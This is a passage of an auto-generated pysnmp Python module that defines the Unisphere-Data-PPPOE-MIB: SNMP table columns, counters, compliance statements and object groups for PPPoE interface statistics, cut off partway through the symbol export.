usdPPPoEIfAutoconfig = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 2, 1, 8), UsdEnable().clone('disable')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEIfAutoconfig.setStatus('current')
usdPPPoEIfStatsTable = MibTable((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3), )
if mibBuilder.loadTexts: usdPPPoEIfStatsTable.setStatus('current')
usdPPPoEIfStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1), ).setIndexNames((0, "Unisphere-Data-PPPOE-MIB", "usdPPPoEIfIfIndex"))
if mibBuilder.loadTexts: usdPPPoEIfStatsEntry.setStatus('current')
usdPPPoEIfStatsRxPADI = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxPADI.setStatus('current')
usdPPPoEIfStatsTxPADO = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsTxPADO.setStatus('current')
usdPPPoEIfStatsRxPADR = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxPADR.setStatus('current')
usdPPPoEIfStatsTxPADS = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsTxPADS.setStatus('current')
usdPPPoEIfStatsRxPADT = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxPADT.setStatus('current')
usdPPPoEIfStatsTxPADT = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsTxPADT.setStatus('current')
usdPPPoEIfStatsRxInvVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxInvVersion.setStatus('current')
usdPPPoEIfStatsRxInvCode = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxInvCode.setStatus('current')
usdPPPoEIfStatsRxInvTags = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxInvTags.setStatus('current')
usdPPPoEIfStatsRxInvSession = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxInvSession.setStatus('current')
usdPPPoEIfStatsRxInvTypes = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxInvTypes.setStatus('current')
usdPPPoEIfStatsRxInvPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxInvPackets.setStatus('current')
usdPPPoEIfStatsRxInsufficientResources = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsRxInsufficientResources.setStatus('current')
usdPPPoEIfStatsTxPADM = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 1, 3, 1, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEIfStatsTxPADM.setStatus('current')
usdPPPoESubIfNextIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 1), UsdNextIfIndex()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESubIfNextIfIndex.setStatus('current')
usdPPPoESubIfTable = MibTable((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2), )
if mibBuilder.loadTexts: usdPPPoESubIfTable.setStatus('current')
usdPPPoESubIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1), ).setIndexNames((0, "Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfIndex"))
if mibBuilder.loadTexts: usdPPPoESubIfEntry.setStatus('current')
usdPPPoESubIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: usdPPPoESubIfIndex.setStatus('current')
usdPPPoESubIfRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoESubIfRowStatus.setStatus('current')
usdPPPoESubIfLowerIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1, 3), InterfaceIndexOrZero()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoESubIfLowerIfIndex.setStatus('current')
usdPPPoESubIfId = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1, 2147483647)).clone(-1)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoESubIfId.setStatus('current')
usdPPPoESubIfSessionId = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESubIfSessionId.setStatus('current')
usdPPPoESubIfMotm = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 127))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoESubIfMotm.setStatus('current')
usdPPPoESubIfUrl = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 2, 2, 1, 7), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 127))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoESubIfUrl.setStatus('current')
usdPPPoEGlobalMotm = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 3, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 127))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: usdPPPoEGlobalMotm.setStatus('current')
usdPPPoEProfileTable = MibTable((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 4, 1), )
if mibBuilder.loadTexts: usdPPPoEProfileTable.setStatus('deprecated')
usdPPPoEProfileEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 4, 1, 1), ).setIndexNames((0, "Unisphere-Data-PPPOE-MIB", "usdPPPoEProfileIndex"))
if mibBuilder.loadTexts: usdPPPoEProfileEntry.setStatus('deprecated')
usdPPPoEProfileIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 4, 1, 1, 1), Unsigned32())
if mibBuilder.loadTexts: usdPPPoEProfileIndex.setStatus('deprecated')
usdPPPoEProfileRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 4, 1, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEProfileRowStatus.setStatus('deprecated')
usdPPPoEProfileMotm = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 4, 1, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 127))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEProfileMotm.setStatus('deprecated')
usdPPPoEProfileUrl = MibTableColumn((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 4, 1, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 127))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: usdPPPoEProfileUrl.setStatus('deprecated')
usdPPPoEMajorInterfaceCount = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoEMajorInterfaceCount.setStatus('current')
usdPPPoESummaryMajorIfAdminUp = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummaryMajorIfAdminUp.setStatus('current')
usdPPPoESummaryMajorIfAdminDown = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummaryMajorIfAdminDown.setStatus('current')
usdPPPoESummaryMajorIfOperUp = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummaryMajorIfOperUp.setStatus('current')
usdPPPoESummaryMajorIfOperDown = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummaryMajorIfOperDown.setStatus('current')
usdPPPoESummaryMajorIfLowerLayerDown = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummaryMajorIfLowerLayerDown.setStatus('current')
usdPPPoESummaryMajorIfNotPresent = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummaryMajorIfNotPresent.setStatus('current')
usdPPPoESummarySubInterfaceCount = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummarySubInterfaceCount.setStatus('current')
usdPPPoESummarySubIfAdminUp = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummarySubIfAdminUp.setStatus('current')
usdPPPoESummarySubIfAdminDown = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummarySubIfAdminDown.setStatus('current')
usdPPPoESummarySubIfOperUp = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummarySubIfOperUp.setStatus('current')
usdPPPoESummarySubIfOperDown = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummarySubIfOperDown.setStatus('current')
usdPPPoESummarySubIfLowerLayerDown = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummarySubIfLowerLayerDown.setStatus('current')
usdPPPoESummarySubIfNotPresent = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 14), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummarySubIfNotPresent.setStatus('current')
usdPPPoEConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4))
usdPPPoECompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 5))
usdPPPoEGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4))
usdPPPoECompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 5, 1)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEGroup"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoECompliance = usdPPPoECompliance.setStatus('obsolete')
usdPPPoECompliance2 = ModuleCompliance((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 5, 2)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEProfileGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoECompliance2 = usdPPPoECompliance2.setStatus('obsolete')
usdPPPoECompliance3 = ModuleCompliance((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 5, 3)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEProfileGroup"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoECompliance3 = usdPPPoECompliance3.setStatus('obsolete')
usdPPPoECompliance4 = ModuleCompliance((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 5, 4)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoECompliance4 = usdPPPoECompliance4.setStatus('obsolete')
usdPPPoECompliance5 = ModuleCompliance((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 5, 5)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEGroup3"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoECompliance5 = usdPPPoECompliance5.setStatus('obsolete')
usdPPPoECompliance6 = ModuleCompliance((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 5, 6)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEGroup4"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoECompliance6 = usdPPPoECompliance6.setStatus('current')
usdPPPoEGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 1)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoENextIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfMaxNumSessions"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfRowStatus"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfLowerIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADI"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADO"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADR"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADS"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvVersion"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvCode"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTags"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvSession"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTypes"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvPackets"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInsufficientResources"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoEGroup = usdPPPoEGroup.setStatus('obsolete')
usdPPPoESubIfGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 2)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfNextIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfRowStatus"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfLowerIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfId"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfSessionId"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoESubIfGroup = usdPPPoESubIfGroup.setStatus('obsolete')
usdPPPoEProfileGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 3)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEProfileRowStatus"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEProfileUrl"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEProfileMotm"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoEProfileGroup = usdPPPoEProfileGroup.setStatus('deprecated')
usdPPPoEGroup2 = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 4)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoENextIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfMaxNumSessions"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfRowStatus"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfLowerIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADI"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADO"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADR"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADS"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvVersion"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvCode"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTags"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvSession"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTypes"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvPackets"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInsufficientResources"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADM"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEGlobalMotm"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoEGroup2 = usdPPPoEGroup2.setStatus('obsolete')
usdPPPoESubIfGroup2 = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 5)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfNextIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfRowStatus"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfLowerIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfId"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfSessionId"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfUrl"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfMotm"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoESubIfGroup2 = usdPPPoESubIfGroup2.setStatus('current')
usdPPPoESummaryGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 6)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEMajorInterfaceCount"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryMajorIfAdminUp"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryMajorIfAdminDown"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryMajorIfOperUp"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryMajorIfOperDown"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryMajorIfNotPresent"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryMajorIfLowerLayerDown"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummarySubInterfaceCount"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummarySubIfAdminUp"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummarySubIfAdminDown"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummarySubIfOperUp"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummarySubIfOperDown"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummarySubIfNotPresent"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummarySubIfLowerLayerDown"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoESummaryGroup = usdPPPoESummaryGroup.setStatus('current')
usdPPPoEGroup3 = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 7)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoENextIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfMaxNumSessions"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfRowStatus"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfLowerIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfAcName"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfDupProtect"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADI"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADO"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADR"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADS"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvVersion"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvCode"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTags"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvSession"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTypes"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvPackets"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInsufficientResources"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADM"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEGlobalMotm"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoEGroup3 = usdPPPoEGroup3.setStatus('obsolete')
usdPPPoEGroup4 = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 8)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoENextIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfMaxNumSessions"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfRowStatus"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfLowerIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfAcName"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfDupProtect"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfPADIFlag"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfAutoconfig"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADI"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADO"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADR"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADS"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvVersion"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvCode"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTags"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvSession"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTypes"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvPackets"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInsufficientResources"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADM"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEGlobalMotm"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoEGroup4 = usdPPPoEGroup4.setStatus('current')
mibBuilder.exportSymbols("Unisphere-Data-PPPOE-MIB", usdPPPoEIfIfIndex=usdPPPoEIfIfIndex, usdPPPoEProfileUrl=usdPPPoEProfileUrl, usdPPPoESubIfNextIfIndex=usdPPPoESubIfNextIfIndex, usdPPPoEIfStatsRxInvCode=usdPPPoEIfStatsRxInvCode, usdPPPoESubIfTable=usdPPPoESubIfTable, usdPPPoEGroup2=usdPPPoEGroup2, usdPPPoECompliance5=usdPPPoECompliance5, usdPPPoESummaryMajorIfOperUp=usdPPPoESummaryMajorIfOperUp, usdPPPoEGlobalMotm=usdPPPoEGlobalMotm, usdPPPoESummaryMajorIfLowerLayerDown=usdPPPoESummaryMajorIfLowerLayerDown, usdPPPoESubIfRowStatus=usdPPPoESubIfRowStatus, usdPPPoEIfDupProtect=usdPPPoEIfDupProtect, usdPPPoESubIfGroup=usdPPPoESubIfGroup, usdPPPoEIfAcName=usdPPPoEIfAcName, usdPPPoECompliances=usdPPPoECompliances, usdPPPoEIfStatsRxPADI=usdPPPoEIfStatsRxPADI, usdPPPoEIfStatsTxPADS=usdPPPoEIfStatsTxPADS, usdPPPoEIfPADIFlag=usdPPPoEIfPADIFlag, usdPPPoESubIfLayer=usdPPPoESubIfLayer, usdPPPoESummarySubIfLowerLayerDown=usdPPPoESummarySubIfLowerLayerDown, PYSNMP_MODULE_ID=usdPPPoEMIB, usdPPPoEIfStatsRxInvPackets=usdPPPoEIfStatsRxInvPackets, usdPPPoESummarySubIfNotPresent=usdPPPoESummarySubIfNotPresent, usdPPPoEProfileEntry=usdPPPoEProfileEntry, usdPPPoESummarySubIfAdminDown=usdPPPoESummarySubIfAdminDown, usdPPPoESubIfLowerIfIndex=usdPPPoESubIfLowerIfIndex, usdPPPoEGroup3=usdPPPoEGroup3, usdPPPoEIfLowerIfIndex=usdPPPoEIfLowerIfIndex, usdPPPoEIfStatsTable=usdPPPoEIfStatsTable, usdPPPoEIfStatsRxInvVersion=usdPPPoEIfStatsRxInvVersion, usdPPPoEProfile=usdPPPoEProfile, usdPPPoEIfStatsEntry=usdPPPoEIfStatsEntry, usdPPPoESubIfIndex=usdPPPoESubIfIndex, usdPPPoEIfStatsRxInvSession=usdPPPoEIfStatsRxInvSession, usdPPPoEProfileMotm=usdPPPoEProfileMotm, usdPPPoEProfileGroup=usdPPPoEProfileGroup, usdPPPoEMIB=usdPPPoEMIB, usdPPPoECompliance6=usdPPPoECompliance6, usdPPPoEIfStatsRxInvTypes=usdPPPoEIfStatsRxInvTypes, usdPPPoEGlobal=usdPPPoEGlobal, 